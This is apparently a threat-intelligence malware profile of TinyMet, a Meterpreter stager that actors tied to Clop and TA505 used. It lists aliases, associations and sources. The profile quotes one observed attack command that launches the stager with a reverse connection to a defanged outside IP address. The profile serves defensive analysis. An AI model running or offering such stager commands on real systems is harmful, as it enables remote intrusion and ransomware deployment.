Tinymet

Malware Profile Updated 3 months ago
TinyMet is a tiny, flexible open-source Meterpreter stager. Threat actors such as GOLD TAHOE have used it to retrieve a Meterpreter stager during Clop ransomware incidents. Like other malware, it can reach a system through suspicious downloads, emails, or websites; once inside, it can be used to steal personal information, disrupt operations, or hold data hostage for ransom. In the observed incidents the malware was executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection to a malicious IP address; the stager selects its transport and destination either from a renamed binary or from the arguments supplied on the command line. The investigation revealed a possible link between the threat actor and TinyMet Payload v0.2, which Clop ransomware previously used as a precursor to the TA505 post-exploitation operation. Use of this payload indicates a sophisticated level of attack planning and execution and suggests that the actors are experienced and highly skilled. Our team discovered a file named wsus.exe, which appears to be a version of TinyMet, along with three additional files that were created and executed on the first compromised system. The file primarily operates as a version of TinyMet, an open-source Meterpreter stager, but the actors also have the option to store and execute any binary loaded into the table. This flexibility allows them to adapt their approach to the specific vulnerabilities of the targeted system.
Possible Aliases / Cluster overlaps
Cluster overlaps and naming conventions are hard to track across vendors, so the following overlapping names and profiles may also be worth reviewing.
ID | Votes | Profile Description
Meterpreter Stager | 2 | The Meterpreter stager is a type of malware, which is malicious software designed to infiltrate and exploit computer systems. It can enter your system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it has the potential to steal personal information, di
Meterpreter | 2 | Meterpreter, a type of malware, is an attack payload of Metasploit that serves as an interactive shell, enabling threat actors to control and execute code on a system. Advanced Persistent Threat (APT) actors have created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, liste
wsus.exe | 1 | None
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Payload
Exploit
Associated Malware
ID | Type | Votes | Profile Description
Clop | Unspecified | 2 | Clop is a notorious malware, short for malicious software, known for its disruptive and damaging effects on computer systems. It primarily infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, Clop can steal personal information, disrupt o
Associated Threat Actors
ID | Type | Votes | Profile Description
TA505 | Unspecified | 1 | TA505, also known as Cl0p Ransomware Gang and Lace Tempest, is a highly active and sophisticated cybercriminal group. The group has been associated with various high-profile cyber-attacks, demonstrating adaptability through a multi-vector approach to their operations. In June 2023, the U.S. Cybersec
Associated Vulnerabilities
ID | Type | Votes | Profile Description
No associations to display
Source Document References
Information about the Tinymet malware was read from the document corpus below. This display is limited to 20 results.
Source | Created At | Title
Secureworks | a year ago | Phases of a Post-Intrusion Ransomware Attack
MITRE | a year ago | Egregor Ransomware – A Deep Dive Into Its Activities and Techniques
MITRE | a year ago | FIN7 Revisited: Inside Astra Panel and SQLRat Malware
MITRE | a year ago | TA505 Continues to Infect Networks With SDBbot RAT